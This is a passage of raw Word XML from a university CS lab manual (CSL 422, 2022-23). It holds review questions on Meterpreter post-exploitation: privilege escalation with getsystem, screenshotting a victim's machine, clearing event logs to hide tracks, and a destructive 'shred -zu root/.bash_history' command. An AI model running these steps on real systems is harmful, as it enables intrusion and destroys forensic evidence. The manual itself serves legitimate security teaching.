                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>getsystem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> command in </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Meterpreter script.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="251D70BE" w14:textId="77777777" w:rsidR="00222427" w:rsidRPr="001C411D" w:rsidRDefault="00222427" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Write the command for taking screenshots of victim's machine after getting </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> access.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="757ADD65" w14:textId="77777777" w:rsidR="00222427" w:rsidRPr="001C411D" w:rsidRDefault="00222427" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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Write the command to clear event logs for clearing hacker's tracks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="058C6AA0" w14:textId="77777777" w:rsidR="00AC15EE" w:rsidRPr="001C411D" w:rsidRDefault="00222427" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">What is the outcome of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>follwoing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> command: </w:t>
            </w:r>
            <w:r w:rsidR="00A72BFF" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>shred -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00A72BFF" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>zu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00A72BFF" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> root/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00A72BFF" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>bash_history</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00A72BFF" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76E32435" w14:textId="77777777" w:rsidR="00222427" w:rsidRPr="001C411D" w:rsidRDefault="00222427" w:rsidP="00222427">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="1080"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B341A41" w14:textId="2234A75F" w:rsidR="004307F9" w:rsidRDefault="004307F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33043603" w14:textId="5F459363" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Student Work Area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4398EFB9" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Algorithm/Flowchart/Code/Sample Outputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3175DB" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D8330BE" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF1CF3A" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A7B49F" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C8F55A" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F79635F" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE62015" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D69A71D" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293CC327" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B176AD0" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C697784" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="251AE782" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14303714" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18BDAD5F" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FB0C458" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B692B99" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CBA7F4D" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B2640B" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB4E73D" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="661808EB" w14:textId="77777777" w:rsidR="00181640" w:rsidRPr="001C411D" w:rsidRDefault="00181640" w:rsidP="00181640">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00181640" w:rsidRPr="001C411D" w:rsidSect="002C63F7">
      <w:headerReference w:type="default" r:id="rId163"/>
      <w:headerReference w:type="first" r:id="rId1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4E64" w14:textId="77777777" w:rsidR="001A4241" w:rsidRDefault="001A4241" w:rsidP="0034450D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="01DDC50B" w14:textId="77777777" w:rsidR="001A4241" w:rsidRDefault="001A4241"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51C4" w14:textId="77777777" w:rsidR="001A4241" w:rsidRDefault="001A4241" w:rsidP="0034450D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="70FF18DE" w14:textId="77777777" w:rsidR="001A4241" w:rsidRDefault="001A4241"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92DF" w14:textId="5548291D" w:rsidR="000D46AB" w:rsidRDefault="002C63F7" w:rsidP="00A435DE">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:r w:rsidRPr="002C63F7">
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41F1B728" wp14:editId="6E4FDDC3">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>2988</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="562876" cy="390525"/>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76" cy="390525"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
    <w:r w:rsidR="000D46AB" w:rsidRPr="000139FD">
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">                                                 </w:t>
    </w:r>
    <w:r w:rsidR="000D46AB">
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">                                             </w:t>
    </w:r>
    <w:r w:rsidR="000D46AB" w:rsidRPr="000139FD">
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="000D46AB">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
        <w:lang w:val="en-IN"/>
      </w:rPr>
      <w:t xml:space="preserve">                                 </w:t>
    </w:r>
    <w:r w:rsidR="006D10F9">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
        <w:lang w:val="en-IN"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidR="000D46AB">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
        <w:lang w:val="en-IN"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="000D46AB">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>CS Lab Manual (CSL 422</w:t>
    </w:r>
    <w:r w:rsidR="00060F14">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>) |</w:t>
    </w:r>
    <w:r w:rsidR="000D46AB">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-404990036"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:r w:rsidR="00C24B82">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C24B82">
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r w:rsidR="00C24B82">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E442BA">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r w:rsidR="00C24B82">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:sdtContent>
    </w:sdt>
  </w:p>
  <w:p w14:paraId="560F5525" w14:textId="56BF9351" w:rsidR="000D46AB" w:rsidRDefault="00A435DE" w:rsidP="00A435DE">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:ind w:left="720"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">                                                                                                                      </w:t>
    </w:r>
    <w:r w:rsidR="006D10F9">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">                                 </w:t>
    </w:r>
    <w:r w:rsidR="000D46AB">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>202</w:t>
    </w:r>
    <w:r w:rsidR="002C63F7">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>2-23</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="1E3ACF11" w14:textId="77777777" w:rsidR="006D10F9" w:rsidRDefault="006D10F9" w:rsidP="00A435DE">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:ind w:left="720"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="29141095" w14:textId="77777777" w:rsidR="006D10F9" w:rsidRPr="002F1DAD" w:rsidRDefault="006D10F9" w:rsidP="00A435DE">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:ind w:left="720"/>
      <w:jc w:val="cent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EAF" w14:textId="7269E0E2" w:rsidR="002C63F7" w:rsidRDefault="002C63F7" w:rsidP="002C63F7">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r w:rsidRPr="002C63F7">
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33C0B794" wp14:editId="2C855E55">
          <wp:extent cx="514350" cy="3568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78" cy="365897"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
    </w:r>
    <w:r w:rsidRPr="000139FD">
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">                                                 </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">                                             </w:t>
    </w:r>
    <w:r w:rsidRPr="000139FD">
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
        <w:lang w:val="en-IN"/>
      </w:rPr>
      <w:t xml:space="preserve">                                  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">CS Lab Manual (CSL 422) | </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="2672781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B5AB928" w14:textId="06474E36" w:rsidR="002C63F7" w:rsidRPr="002F1DAD" w:rsidRDefault="002C63F7" w:rsidP="002C63F7">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">                                                                                                                                                                               2022-23     </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="7AD126DA" w14:textId="77777777" w:rsidR="000D46AB" w:rsidRDefault="000D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C1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B360020"/>
    <w:lvl w:ilvl="0" w:tplc="09321AA2">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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0B0F02F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21A86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80E3B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B520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CD3B76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB0E26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B1D9C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5AF01B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C8D14C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="120EE3D0"/>
    <w:lvl w:ilvl="0" w:tplc="40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4B5930"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29EA82FA"/>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1A7D6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2706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E4027"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9FBC6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6E73A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="848A1B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0672848"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1588803A"/>
    <w:lvl w:ilvl="0" w:tplc="90CA042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9672D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E2881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BB370FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A3CDE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D1C279D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0CA7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6EC0A70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17B84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33D88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17B8406C"/>
    <w:lvl w:ilvl="0" w:tplc="90CA0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634FB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
